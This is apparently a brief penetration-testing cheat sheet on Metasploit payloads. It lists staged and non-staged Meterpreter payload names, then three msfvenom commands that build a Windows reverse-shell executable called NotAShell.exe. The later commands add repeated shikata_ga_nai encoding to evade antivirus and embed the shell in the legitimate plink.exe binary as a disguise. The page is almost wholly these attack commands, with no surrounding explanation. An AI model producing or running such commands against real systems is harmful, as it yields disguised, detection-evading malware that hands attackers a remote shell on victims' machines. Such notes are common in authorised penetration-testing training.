Payloads
Staged vs. Non-staged Payloads
windows/x64/meterpreter_reverse_tcpwindows/x64/meterpreter/reverse_tcpExecutable Payloads
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -o NotAShell.exemsfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o NotAShell.exemsfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o NotAShell.exe
Last updated